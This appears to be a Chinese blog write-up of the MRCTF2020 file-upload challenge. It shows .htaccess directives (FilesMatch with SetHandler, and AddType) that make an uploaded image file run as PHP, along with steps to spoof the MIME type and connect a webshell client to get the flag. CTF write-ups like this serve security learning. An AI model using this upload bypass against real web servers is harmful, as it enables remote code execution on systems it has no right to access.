[MRCTF2020]你传你呢

follycat2024-11-01 22:41

[MRCTF2020]你传你🐎呢

审题

一眼文件上传

知识点

.htaccess文件的作用

php 复制代码 
<FilesMatch  "a.png">
SetHandler  application/x-httpd-php
</FilesMatch>

将a.png当做php文件执行

php 复制代码 
AddType application/x-httpd-php .jpg

AddType 是一个 Apache 服务器的指令,用于将指定文件扩展名与指定的 MIME 类型关联起来。

解题

  1. 上传.htaccess文件,并更改上传类型为image/png

  2. 上传a.png文件,同样更改上传类型

  3. 上传成功后转到uploud/.../a.png目录

  4. 连接蚁剑得到flag

TLXQ-1730462329289)]

  1. 连接蚁剑得到flag
相关推荐
非凡ghost10 分钟前
PowerDirector安卓版(威力导演安卓版)
android·windows·学习·软件需求
代码游侠33 分钟前
C语言核心概念复习——C语言基础阶段
linux·开发语言·c++·学习
天荒地老笑话么42 分钟前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
dingdingfish1 小时前
Bash学习 - 第3章:Basic Shell Features,第5节:Shell Expansions
开发语言·学习·bash
firewood20241 小时前
共射三极管放大电路相关情况分析
笔记·学习
zl0_00_01 小时前
美亚2023
学习
AI_56781 小时前
SQL性能优化全景指南:从量子执行计划到自适应索引的终极实践
数据库·人工智能·学习·adb
zl0_00_01 小时前
pctf wp
学习
Hello_Embed1 小时前
libmodbus STM32 主机实验(USB 串口版)
笔记·stm32·学习·嵌入式·freertos·modbus
学编程的闹钟1 小时前
98【html的php化】
学习
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03UV安装并设置国内源04openclaw配置教程(linux+局域网ollama)05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07OpenClaw Chrome扩展使用教程 - 浏览器中继控制08Claude Code Skills 实用使用手册09openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决10Vue-skills的中文文档